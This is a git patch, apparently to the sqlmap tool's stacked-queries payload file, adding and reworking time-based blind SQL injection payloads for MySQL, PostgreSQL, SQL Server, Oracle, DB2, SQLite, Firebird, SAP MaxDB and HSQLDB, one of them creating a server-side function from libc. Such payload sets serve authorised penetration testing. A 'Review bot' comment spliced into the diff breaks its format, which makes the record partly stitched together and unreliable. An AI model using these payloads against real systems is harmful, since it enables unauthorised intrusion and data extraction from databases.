From 37ca0a95f14218d3bcf78032f233d76da266418d Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Tue, 3 Mar 2015 14:19:36 +0000 Subject: [PATCH] consolidated stacked queries payloads - issue #1169 --- xml/payloads/04_stacked_queries.xml | 408 ++++++++++++++++++++++++++-- 1 file changed, 381 insertions(+), 27 deletions(-) diff --git a/xml/payloads/04_stacked_queries.xml b/xml/payloads/04_stacked_queries.xml index 3c5a41869..45ce87a9f 100644 --- a/xml/payloads/04_stacked_queries.xml +++ b/xml/payloads/04_stacked_queries.xml @@ -2,6 +2,27 @@ + + MySQL > 5.0.11 stacked queries (SELECT - comment) + 4 + 1 + 1 + 0 + 1 + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + > 5.0.11 +
+
+ MySQL > 5.0.11 stacked queries (SELECT) 4 @@ -23,15 +44,15 @@ - MySQL > 5.0.11 stacked queries (SELECT - comment) + MySQL > 5.0.11 stacked queries (comment) 4 - 4 + 2 1 0 1 - ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + ;SELECT SLEEP([SLEEPTIME]) # @@ -46,14 +67,13 @@ MySQL > 5.0.11 stacked queries 4 - 1 + 3 1 0 1 ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) ;SELECT SLEEP([SLEEPTIME]) - -- @@ -65,7 +85,7 @@ - MySQL < 5.0.12 stacked queries (heavy query) + MySQL < 5.0.12 stacked queries (heavy query - comment) 4 2 2 @@ -74,7 +94,7 @@ ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) ;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) - -- + # @@ -85,7 +105,26 @@ - PostgreSQL > 8.1 stacked queries + MySQL < 5.0.12 stacked queries (heavy query) + 4 + 4 + 2 + 0 + 1 + ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + ;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + + + + +
+ MySQL +
+
+ + + PostgreSQL > 8.1 stacked queries (comment) 4 1 1 @@ -106,7 +145,27 @@ - PostgreSQL stacked queries (heavy query) + PostgreSQL > 8.1 stacked queries + 4 + 4 + 1 + 0 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;SELECT PG_SLEEP([SLEEPTIME]) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL stacked queries (heavy query - comment) 4 2 2 @@ -126,9 +185,28 @@ - PostgreSQL < 8.2 stacked queries (Glibc) + PostgreSQL stacked queries (heavy query) 4 - 4 + 5 + 2 + 0 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + ;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000) + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL < 8.2 stacked queries (Glibc - comment) + 4 + 3 1 0 1 @@ -148,7 +226,28 @@ - Microsoft SQL Server/Sybase stacked queries + PostgreSQL < 8.2 stacked queries (Glibc) + 4 + 5 + 1 + 0 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + ;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]) + + + + +
+ PostgreSQL + < 8.2 + Linux +
+
+ + + Microsoft SQL Server/Sybase stacked queries (comment) 4 1 1 @@ -170,9 +269,30 @@ - Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE) + Microsoft SQL Server/Sybase stacked queries 4 - 5 + 4 + 1 + 0 + 1 + ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + ;WAITFOR DELAY '0:0:[SLEEPTIME]' + + + + +
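Review bot: The PostgreSQL < 8.2 (Glibc) entry in this hunk is the only payload in the file whose `;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; ...` request creates a persistent server-side object, yet its risk value stays at the same level as the side-effect-free PG_SLEEP payloads (the `+ 4 + 5 + 1` run, read as stype/level/risk since the element tags were stripped in this view — please confirm against the payload schema). In the rest of this file risk 2 is reserved for heavy-query payloads (`4 2 2`, `4 5 2`) and nothing below that tier alters the target schema, so this entry looks misclassified and a reviewer would expect a higher risk value so it is not chosen under the default settings. The function is also never dropped afterwards, which leaves a lasting artifact in the tested database; at minimum the entry deserves an XML comment above it, e.g. `<!-- creates a persistent SLEEP() function on the server; not cleaned up -->`, so the side effect is visible to whoever tunes level/risk later. The same classification question does not apply to the other hunks, whose payloads are pure delays or heavy SELECTs.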
+ Microsoft SQL Server + Sybase + Windows +
+
+ + + Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment) + 4 + 1 1 0 1 @@ -190,9 +310,28 @@ - Oracle stacked queries (heavy query) + Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE) 4 - 5 + 4 + 1 + 0 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL + + ;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (heavy query - comment) + 4 + 2 2 0 1 @@ -209,6 +348,45 @@ + + Oracle stacked queries (heavy query) + 4 + 5 + 2 + 0 + 1 + ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL + + ;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5 + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (DBMS_LOCK.SLEEP - comment) + 4 + 4 + 1 + 0 + 1 + ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END + + ;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END + -- + + + + +
+ Oracle +
+
+ Oracle stacked queries (DBMS_LOCK.SLEEP) 4 @@ -219,6 +397,25 @@ ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END ;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END + + + + +
+ Oracle +
+
+ + + Oracle stacked queries (USER_LOCK.SLEEP - comment) + 4 + 5 + 1 + 0 + 1 + ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END + + ;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END -- @@ -239,7 +436,6 @@ ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END ;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END - -- @@ -250,7 +446,46 @@ - SQLite > 2.0 stacked queries (heavy query) + IBM DB2 stacked queries (heavy query - comment) + 5 + 3 + 2 + 1,2,3 + 1 + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) + + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 + -- + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 stacked queries (heavy query) + 5 + 5 + 2 + 1,2,3 + 1 + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]) + + ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 + + + + +
+ IBM DB2 +
+
+ + + SQLite > 2.0 stacked queries (heavy query - comment) 4 3 2 @@ -271,9 +506,29 @@ - Firebird stacked queries (heavy query) + SQLite > 2.0 stacked queries (heavy query) 4 - 3 + 5 + 2 + 0 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + ;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + + + + +
+ SQLite + > 2.0 +
+
+ + + Firebird stacked queries (heavy query - comment) + 4 + 4 2 0 1 @@ -292,10 +547,69 @@ - HSQLDB >= 1.7.2 stacked queries + Firebird stacked queries (heavy query) 4 - 3 - 1 + 5 + 2 + 0 + 1 + ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE + + ;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4 + + + + +
+ Firebird + >= 2.0 +
+
+ + + SAP MaxDB stacked queries (heavy query - comment) + 5 + 4 + 2 + 1,2,3 + 1 + ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 + + ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3 + -- + + + + +
+ SAP MaxDB +
+
+ + + SAP MaxDB stacked queries (heavy query) + 5 + 5 + 2 + 1,2,3 + 1 + ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3 + + ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3 + + + + +
+ SAP MaxDB +
+
+ + + HSQLDB >= 1.7.2 stacked queries (heavy query - comment) + 4 + 4 + 2 0 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END @@ -313,10 +627,30 @@ - HSQLDB >= 2.0 stacked queries + HSQLDB >= 1.7.2 stacked queries (heavy query) + 4 + 5 + 2 + 0 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 2.0 stacked queries (heavy query - comment) 4 4 - 1 + 2 0 1 ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END @@ -332,6 +666,26 @@ >= 2.0 - + + + HSQLDB >= 2.0 stacked queries (heavy query) + 4 + 5 + 2 + 0 + 1 + ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END + + ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + >= 2.0 +
+
+